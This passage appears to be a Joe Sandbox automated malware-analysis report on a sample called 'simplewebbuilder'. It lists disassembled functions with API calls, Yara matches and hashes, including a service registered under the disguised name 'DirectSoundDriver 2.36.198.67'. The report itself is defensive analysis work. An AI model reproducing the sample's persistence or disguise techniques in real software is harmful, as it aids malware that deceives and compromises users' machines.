                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: ae7afe965ff9a3ecbc8486dd1b4689d18e3202cc6d0a72081f8daf504a349405
                                                                                                                            • Instruction ID: 99bdeb66c25d7882e47129af594b0bc7f949bf8350cb5c478b60691a8db92f05
                                                                                                                            • Opcode Fuzzy Hash: ae7afe965ff9a3ecbc8486dd1b4689d18e3202cc6d0a72081f8daf504a349405
                                                                                                                            • Instruction Fuzzy Hash: 05C04C30648A00FBD15217905F1DF78B624AB48704F2105336202744D04EFD655A6A5F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402277 Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 0040D2DD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 4b54607c53e5afc8bcad59e31fb2df2bd3f5564124c78793773209d2963770df
                                                                                                                            • Instruction ID: d4b1b726c4b427a33dedd67dcd64e749c90eb7d8801a8fafa5166cc988795ddd
                                                                                                                            • Opcode Fuzzy Hash: 4b54607c53e5afc8bcad59e31fb2df2bd3f5564124c78793773209d2963770df
                                                                                                                            • Instruction Fuzzy Hash: 96B09221948A00D6E20407E06F09F2035207701700F20027BA30B344E18ABD045ABA0F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004022E0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: dd2500420811c0cf5d79b7dbb7b62d26b288871a1f23200e63fe0e4b8f5fc987
                                                                                                                            • Instruction ID: 09a3a55a0c1ccc5a13469ec0f5d8f443f01b90285bca804ea3e96fc62782eb60
                                                                                                                            • Opcode Fuzzy Hash: dd2500420811c0cf5d79b7dbb7b62d26b288871a1f23200e63fe0e4b8f5fc987
                                                                                                                            • Instruction Fuzzy Hash: C2B0927AC04112EFDB111BA08A04468BA60AB08340725407AE54272250C638442DABDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D1E3 Relevance: 1.3, APIs: 1, Instructions: 3stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1586166983-0
                                                                                                                            • Opcode ID: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
                                                                                                                            • Instruction ID: 1999ed2a319cb111f58d93e36599d65504c6bfb494e199db35daf75dc5fcdc4b
                                                                                                                            • Opcode Fuzzy Hash: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
                                                                                                                            • Instruction Fuzzy Hash: 1F900260304201EFE2000B325F0C31525A46704641712443D5447E0194DA7C8005956A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 009C0EC0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009BA0CF: __EH_prolog.LIBCMT ref: 009BA0D4
                                                                                                                              • Part of subcall function 009BA0CF: _Allocate.LIBCPMT ref: 009BA12B
                                                                                                                              • Part of subcall function 009BA0CF: _memmove.LIBCMT ref: 009BA182
                                                                                                                            • _memset.LIBCMT ref: 009C0F39
                                                                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 009C0FA2
                                                                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 009C0FAA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                                                            • String ID: Unknown error$invalid string position
                                                                                                                            • API String ID: 1854462395-1837348584
                                                                                                                            • Opcode ID: 629ac290146b9226b5def0cc62c36f6d3185d6c31b25377b262d7cf6123a4098
                                                                                                                            • Instruction ID: 8c7213f5d48853a3f56a92fdbeb434c553c719bfc58e50bbbde8bf86a539fcf8
                                                                                                                            • Opcode Fuzzy Hash: 629ac290146b9226b5def0cc62c36f6d3185d6c31b25377b262d7cf6123a4098
                                                                                                                            • Instruction Fuzzy Hash: 0F51BA70A08381CFE714DF24C890F6FBBE8AB99744F50092DF48197292D771E6888B97
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C9B28 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,009C5496,?,?,?,00000001), ref: 009C9B2D
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009C9B36
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: a5ea72b52a73c2f147323ec3cadc2760bfed1d41004b65b41d910856afaf8d34
                                                                                                                            • Instruction ID: 5e829e3ba779c0d89b833031aec784dba6e256d3ce89609d688c5986b8e86579
                                                                                                                            • Opcode Fuzzy Hash: a5ea72b52a73c2f147323ec3cadc2760bfed1d41004b65b41d910856afaf8d34
                                                                                                                            • Instruction Fuzzy Hash: DCB092310A9208FBCB002B91EC09B8A3F28EB05662F008012F60D840A28F625494AAA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BFE51 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                                                            • Instruction ID: 2a3e1000ac3e512c6e4f1714b9d91ef26b176fdcc43107252e5dd061cef89c92
                                                                                                                            • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                                                            • Instruction Fuzzy Hash: 39F082B190430DABD700DF95DA42B9DFBB8FB84310F208179E50CA7341E6707A118B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B24E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B24E6
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 009B24FC
                                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 009B250E
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009B256D
                                                                                                                            • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 009B257F
                                                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 009B2599
                                                                                                                            • GetLastError.KERNEL32(?,7591DFB0), ref: 009B25A2
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009B25F0
                                                                                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 009B262F
                                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 009B268E
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B2699
                                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000001), ref: 009B26AD
                                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 009B26BD
                                                                                                                            • GetLastError.KERNEL32(?,7591DFB0), ref: 009B26C7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1213838671-0
                                                                                                                            • Opcode ID: 9bb1a5d6ef148c9cd366463ff1bbf864dc17b056d20d9b693403c6fe061824f3
                                                                                                                            • Instruction ID: 80add12356d52c56145ee1d1d8b117e3c15d76b75059c2b9a39196276da54f7c
                                                                                                                            • Opcode Fuzzy Hash: 9bb1a5d6ef148c9cd366463ff1bbf864dc17b056d20d9b693403c6fe061824f3
                                                                                                                            • Instruction Fuzzy Hash: B3616E71915209EFCB10DFA4C989AEEBBF9FF48320F14492EE516E3251DB34A944DB60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B4717 Relevance: 19.9, APIs: 13, Instructions: 442networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B471C
                                                                                                                              • Part of subcall function 009C414C: _malloc.LIBCMT ref: 009C4164
                                                                                                                            • htons.WS2_32(?), ref: 009B477D
                                                                                                                            • htonl.WS2_32(?), ref: 009B47A0
                                                                                                                            • htonl.WS2_32(00000000), ref: 009B47A7
                                                                                                                            • htons.WS2_32(00000000), ref: 009B485B
                                                                                                                            • _sprintf.LIBCMT ref: 009B4871
                                                                                                                              • Part of subcall function 009B8F82: _memmove.LIBCMT ref: 009B8FA2
                                                                                                                            • htons.WS2_32(?), ref: 009B47C4
                                                                                                                              • Part of subcall function 009B9D2D: __EH_prolog.LIBCMT ref: 009B9D32
                                                                                                                              • Part of subcall function 009B9D2D: RtlEnterCriticalSection.NTDLL(00000020), ref: 009B9DAD
                                                                                                                              • Part of subcall function 009B9D2D: RtlLeaveCriticalSection.NTDLL(00000020), ref: 009B9DCB
                                                                                                                              • Part of subcall function 009B1BA7: __EH_prolog.LIBCMT ref: 009B1BAC
                                                                                                                              • Part of subcall function 009B1BA7: RtlEnterCriticalSection.NTDLL ref: 009B1BBC
                                                                                                                              • Part of subcall function 009B1BA7: RtlLeaveCriticalSection.NTDLL ref: 009B1BEA
                                                                                                                              • Part of subcall function 009B1BA7: RtlEnterCriticalSection.NTDLL ref: 009B1C13
                                                                                                                              • Part of subcall function 009B1BA7: RtlLeaveCriticalSection.NTDLL ref: 009B1C56
                                                                                                                              • Part of subcall function 009BE4E9: __EH_prolog.LIBCMT ref: 009BE4EE
                                                                                                                            • htonl.WS2_32(?), ref: 009B4A90
                                                                                                                            • htonl.WS2_32(00000000), ref: 009B4A97
                                                                                                                            • htonl.WS2_32(00000000), ref: 009B4ADC
                                                                                                                            • htonl.WS2_32(00000000), ref: 009B4AE3
                                                                                                                            • htons.WS2_32(?), ref: 009B4B03
                                                                                                                            • htons.WS2_32(?), ref: 009B4B0D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1645262487-0
                                                                                                                            • Opcode ID: c884afd309f5e18bf6d66aea0acefebaff0710685e5937bc90925e755cab8a30
                                                                                                                            • Instruction ID: 813c604cf18c134de072b8d7ce451c8b907fd6df0d938fb9ea071628c0707ccb
                                                                                                                            • Opcode Fuzzy Hash: c884afd309f5e18bf6d66aea0acefebaff0710685e5937bc90925e755cab8a30
                                                                                                                            • Instruction Fuzzy Hash: F9029A71C0121DEFDF15DBE4C945BEEBBB8AF48324F10405AE505B7292DB705A88DBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(DirectSoundDriver 2.36.198.67,0040235E), ref: 004023C1
                                                                                                                            • SetServiceStatus.ADVAPI32(0040C418), ref: 00402420
                                                                                                                            • GetLastError.KERNEL32 ref: 00402422
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                                                            • GetLastError.KERNEL32 ref: 00402450
                                                                                                                            • SetServiceStatus.ADVAPI32(0040C418), ref: 00402480
                                                                                                                            • CreateThread.KERNEL32 ref: 0040248C
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                                                            • CloseHandle.KERNEL32 ref: 004024A1
                                                                                                                            • SetServiceStatus.ADVAPI32(0040C418), ref: 004024CA
                                                                                                                            Strings
                                                                                                                            • DirectSoundDriver 2.36.198.67, xrefs: 004023BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                                                            • String ID: DirectSoundDriver 2.36.198.67
                                                                                                                            • API String ID: 3346042915-3753546761
                                                                                                                            • Opcode ID: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
                                                                                                                            • Instruction ID: 1a01264c41601166a4e66a8b54459f3afdfc7a3d4d59415bdd3a2783c39f4923
                                                                                                                            • Opcode Fuzzy Hash: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
                                                                                                                            • Instruction Fuzzy Hash: F821D670401210EBD2105F26EFE996A7EACFBC9754751823EE544B22B1C7B90409DF6C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C8932 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlDecodePointer.NTDLL(?), ref: 009C893A
                                                                                                                            • _free.LIBCMT ref: 009C8953
                                                                                                                              • Part of subcall function 009C3574: HeapFree.KERNEL32(00000000,00000000,?,009C62D2,00000000,00000104,75920A60), ref: 009C3588
                                                                                                                              • Part of subcall function 009C3574: GetLastError.KERNEL32(00000000,?,009C62D2,00000000,00000104,75920A60), ref: 009C359A
                                                                                                                            • _free.LIBCMT ref: 009C8966
                                                                                                                            • _free.LIBCMT ref: 009C8984
                                                                                                                            • _free.LIBCMT ref: 009C8996
                                                                                                                            • _free.LIBCMT ref: 009C89A7
                                                                                                                            • _free.LIBCMT ref: 009C89B2
                                                                                                                            • _free.LIBCMT ref: 009C89D6
                                                                                                                            • RtlEncodePointer.NTDLL(0080A680), ref: 009C89DD
                                                                                                                            • _free.LIBCMT ref: 009C89F2
                                                                                                                            • _free.LIBCMT ref: 009C8A08
                                                                                                                            • _free.LIBCMT ref: 009C8A30
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3064303923-0
                                                                                                                            • Opcode ID: b3da8b26474f7922520dda19294a9cafa49feb1389a2878edd8606d740761b94
                                                                                                                            • Instruction ID: a9316c0fa0a2f06f890dcaf1eb2d3da977df14ef7581073636835f31f7d91933
                                                                                                                            • Opcode Fuzzy Hash: b3da8b26474f7922520dda19294a9cafa49feb1389a2878edd8606d740761b94
                                                                                                                            • Instruction Fuzzy Hash: C3217372D2D6918BCB215F94FC80F27BB68A746321319816EF4085B2B1CA345E41EB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406AC3 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B05
                                                                                                                            • LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406B21
                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,7U@ ,?,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B6A
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406BA2
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
                                                                                                                            • LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$ByteCharMultiWide
                                                                                                                            • String ID: 7U@
                                                                                                                            • API String ID: 352835431-3990396050
                                                                                                                            • Opcode ID: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
                                                                                                                            • Instruction ID: 02e506ee65740420ae3233abb4e535ac9c0d9cfafd58d7118099ca6790f9c1e8
                                                                                                                            • Opcode Fuzzy Hash: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
                                                                                                                            • Instruction Fuzzy Hash: FE51AE71500209EFDF219F54CE49EAF7FB5FB48750F11412AF952B22A0D73A8861EB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B3423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B3428
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 009B346B
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009B3472
                                                                                                                            • GetLastError.KERNEL32 ref: 009B3486
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 009B34D7
                                                                                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 009B34ED
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 009B3518
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                                                            • String ID: CancelIoEx$KERNEL32
                                                                                                                            • API String ID: 2902213904-434325024
                                                                                                                            • Opcode ID: d43fe4a39c5c0f58d6aed4d39f465f306c78565c71f2986c92a5353131a123c0
                                                                                                                            • Instruction ID: 4a5155dc9d1ed2962df031e213ae7a94905f1de7e53269cf40a7c5e31c0235db
                                                                                                                            • Opcode Fuzzy Hash: d43fe4a39c5c0f58d6aed4d39f465f306c78565c71f2986c92a5353131a123c0
                                                                                                                            • Instruction Fuzzy Hash: 9831B471904205DFDB11EF64C944BAABBF8FF89320F14845AE9059B352CB74DA00DBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406723 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004053C1,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 00406735
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040674D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040675E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040676B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                            • API String ID: 2238633743-4044615076
                                                                                                                            • Opcode ID: d3419985ad88c67346e684d4d63523e685432ef50571a5d9d37b6701a5455ac8
                                                                                                                            • Instruction ID: 7fc34865fb6cd96f75d35faf7655371ce0829d27f510573cbc416552b2b19a82
                                                                                                                            • Opcode Fuzzy Hash: d3419985ad88c67346e684d4d63523e685432ef50571a5d9d37b6701a5455ac8
                                                                                                                            • Instruction Fuzzy Hash: 5F018871200301EFCB209FB59EC096F3AE89B98745316183FB145F3291DE7A88118B6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040697A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 004069B9
                                                                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 004069D3
                                                                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A07
                                                                                                                            • MultiByteToWideChar.KERNEL32(7U@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A3F
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406A95
                                                                                                                            • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406AA7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: StringType$ByteCharMultiWide
                                                                                                                            • String ID: 7U@
                                                                                                                            • API String ID: 3852931651-3990396050
                                                                                                                            • Opcode ID: acbd839e8d8ecd8a78113468315f90f2f487c60c4e6f1d93c346ab407284bb9c
                                                                                                                            • Instruction ID: 163a86b768802ebad6552dab4735af5f1520240db88ca7a198a85c033bcdd74c
                                                                                                                            • Opcode Fuzzy Hash: acbd839e8d8ecd8a78113468315f90f2f487c60c4e6f1d93c346ab407284bb9c
                                                                                                                            • Instruction Fuzzy Hash: 28418D71600209AFCF209F94CD86EAF3B69FB05750F11453AFA12B2290C7398D649B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040529D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0040530A
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004053E0
                                                                                                                            • WriteFile.KERNEL32(00000000), ref: 004053E7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$HandleModuleNameWrite
                                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                            • API String ID: 3784150691-4022980321
                                                                                                                            • Opcode ID: 04978173c4f2aad6ddf0a9b2dd67cf14b182e4245fdcd9156cda6d464bb7ec48
                                                                                                                            • Instruction ID: 92436d38ab3050e8b35fbc92b936da31f470892ba1b2a307495bbf6c2249caee
